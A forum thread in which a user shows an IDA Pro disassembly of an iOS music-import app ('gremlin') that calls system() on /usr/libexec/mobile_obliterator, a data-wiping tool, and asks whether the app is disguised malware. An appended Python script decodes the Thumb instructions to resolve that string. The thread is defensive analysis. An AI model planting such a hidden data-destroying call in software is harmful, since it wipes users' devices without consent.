1. theSmallNothing
    Ok, don't know where to put this, but here it is.

    Been putting a few files through IDA Pro when I came across this in the gremlin app (the gremlin app is a library to supposedly add music to the iPod library):

    __text:00001198 loc_1198
    __text:00001198     LDR     R0, =(aUsrLibexecMobi - 0x119E)
    __text:0000119A     ADD     R0, PC          ; "/usr/libexec/mobile_obliterator"
    __text:0000119C     BLX     _system
    __text:000011A0     B       loc_1168

    My asm is quite rusty, but I'm pretty sure that this loads "/usr/libexec/mobile_obliterator" into some register and then calls the system function, which would execute it.

    Apart from erasing the data on the iDevice, what else does "/usr/libexec/mobile_obliterator" do?
    And why would someone include it in their program?

    The only reason I can think of is that it is a malicious virus that has been disguised as gremlin (the rest of the code looks pretty normal).

    Anyone know anything else?

    2011-04-06 09:44 PM
  2. Buckstar
    Well, I think your post is quite interesting. Have you gotten any ideas? My device slipped into loops three times in roughly a week, and this morning I caught it just in time. Now it's in safe mode, the network is set to off, and I'm hoping to figure out what can be done. Your post came up in a search on "system("killall SpringBoard")", and there is a code source by developers with August 2011 postings for MobileObliterator and an Obliterate Data Partition routine. There is coding for watchdog and NVRAM, which apparently are related to the infamous shutdown and recovery loop initiation. I'm not sure, but that may be related to yours. I hope this helps, and perhaps you could post some feedback.
    2012-06-15 06:25 PM
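
The disassembly in the first post can be checked mechanically. The following is an added example, not code from the thread or from the gremlin app: it decodes the Thumb `LDR`/`ADD R0, PC` pair and resolves the string that reaches `_system`, showing why the constant is 0x119E (Thumb reads PC as the instruction address plus 4). The byte image is constructed; the literal-pool address 0x11A4 and string address 0x11A8 are assumptions, and the `BLX` bytes are a placeholder.

```python
import struct

BASE = 0x1198  # address of loc_1198 in the posted listing

def build_image():
    """Constructed bytes mirroring the listing (pool/string placement assumed)."""
    code = struct.pack("<6H",
        0x4802,          # 0x1198 LDR R0, [PC, #8]  -> literal word at 0x11A4
        0x4478,          # 0x119A ADD R0, PC
        0xF000, 0xE800,  # 0x119C BLX placeholder (32-bit, not decoded here)
        0xE7E2,          # 0x11A0 B loc_1168
        0xBF00)          # 0x11A2 NOP, pads the literal pool to 4 bytes
    literal = struct.pack("<I", 0x11A8 - 0x119E)  # string address minus PC value
    return code + literal + b"/usr/libexec/mobile_obliterator\x00"

def u16(img, addr):
    return struct.unpack_from("<H", img, addr - BASE)[0]

def u32(img, addr):
    return struct.unpack_from("<I", img, addr - BASE)[0]

def resolve_r0(img, addr):
    """Return (pc_value, pointer, string) for an LDR-literal + ADD Rd, PC pair."""
    ldr, add = u16(img, addr), u16(img, addr + 2)
    if ldr >> 11 != 0b01001:              # LDR Rt, [PC, #imm8*4]
        raise ValueError("not a Thumb LDR (literal)")
    rt = (ldr >> 8) & 7
    # LDR literal uses PC = instruction address + 4, rounded down to a word
    lit_addr = ((addr + 4) & ~3) + (ldr & 0xFF) * 4
    value = u32(img, lit_addr)
    if add >> 8 != 0x44:                  # ADD Rdn, Rm (high-register form)
        raise ValueError("not a Thumb ADD (register)")
    rm = (add >> 3) & 0xF
    rdn = ((add >> 4) & 8) | (add & 7)
    if rm != 15 or rdn != rt:
        raise ValueError("ADD does not add PC to the loaded register")
    pc_value = (addr + 2) + 4             # PC as seen by the ADD instruction
    ptr = (value + pc_value) & 0xFFFFFFFF
    start = ptr - BASE
    end = img.index(b"\x00", start)
    return pc_value, ptr, img[start:end].decode("ascii")

if __name__ == "__main__":
    pc, ptr, path = resolve_r0(build_image(), BASE)
    print(f"PC at ADD = {pc:#x}, R0 = {ptr:#x} -> {path!r} passed to system()")
```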